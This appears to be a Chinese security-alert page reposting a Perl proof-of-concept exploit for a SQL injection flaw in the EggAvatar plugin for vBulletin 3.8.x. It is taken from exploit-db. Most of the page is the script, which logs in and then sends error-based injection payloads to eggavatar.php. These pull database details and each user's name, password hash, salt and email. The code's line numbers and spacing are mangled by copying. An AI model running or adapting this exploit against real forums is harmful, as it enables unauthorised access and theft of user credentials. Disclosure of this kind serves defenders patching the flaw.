vBulletin是一款著名的商业论坛程序,vBulletin 3.8.x中的EggAvatar插件存在SQL注入漏洞,可能导致敏感信息泄露,
EggAvatar for vBulletin 3.8.x SQL注入漏洞漏洞预警
。[+]info:
~~~~~~~~~
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
[+]poc:
~~~~~~~~~
view source
print? 01#!/usr/bin/env perl
02useLWP::UserAgent;
03subbanner{
04print"###################################\n";
05print"############ DSecurity ############\n";
06print"###################################\n";
07print"# Email:dsecurity.vn[at]gmail.com #\n";
08print"###################################\n";
09}
10if(@ARGV<5){
11print"Usage: $0 address username password number_user sleeptime\n";
12print"Example: $0 http://localhost/vbb test test 10 10\n";
13exit();
14}
15$ua=LWP::UserAgent->new();
16$ua->agent("DSecurity");
17$ua->cookie_jar({});
18sublogin(@){
19my$username=shift;
20my$password=shift;
21my$req= HTTP::Request->new(POST =>$ARGV[0].'/login.php?do=login');
22$req->content_type('application/x-www-form-urlencoded');
23$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");
24my$res=$ua->request($req);
25}
26subv_request{
27#Declare
28$print=$_[0];
29$select=$_[1];
30$from=$_[2];
31$where=$_[3];
32$limit=$_[4];
33$sleep=$ARGV[4];
34if($fromeq'') {$from='information_schema.tables';}
35if($whereeq'') {$where='1';}
36if($limiteq'') {$limit='0';}
37if($sleepeq'') {$sleep='10';}
38
39# Create a request
40my$req= HTTP::Request->new(POST =>$ARGV[0].'/eggavatar.php');
41$req->content_type('application/x-www-form-urlencoded');
42$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");
43# Pass request to the user agent and get a response back
44my$res=$ua->request($req);
45#print $res->content;
46if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
47{$test=$3};
48sleep($sleep);
49return$print.$test."\n";
50}
51&banner;
52print"\n#############################################################################################################\n";
53print"# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n";
54print"# Date:06-03-2011 #\n";
55print"# Author: DSecurity #\n";
56print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
57print"# Version: 2.3.2 #\n";
58print"# Tested on: vBulletin 3.8.0 #\n";
59print"#############################################################################################################\n";
60
61#login
62login($ARGV[1],$ARGV[2]);
63#Foot print
64printv_request('MySQL version: ','@@version');
65printv_request('Data dir: ','@@datadir');
66printv_request('User: ','user()');
67printv_request('Database: ','database()');
68#Get user
69for($i=1;$i<=$ARGV[3];$i++){
70print"-----------------------------------------\n";
71print$id= v_request('ID: ','userid','user','1',$i-1);
72if($id=~ /(ID:)\s(.*)/){
73printv_request('Group: ','usergroupid','user','userid='.$2);
74printv_request('Username: ','username','user','userid='.$2);
75printv_request('Password: ','password','user','userid='.$2);
76printv_request('Salt: ','salt','user','userid='.$2);
77printv_request('Email: ','email','user','userid='.$2);
78}
79
80}
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16934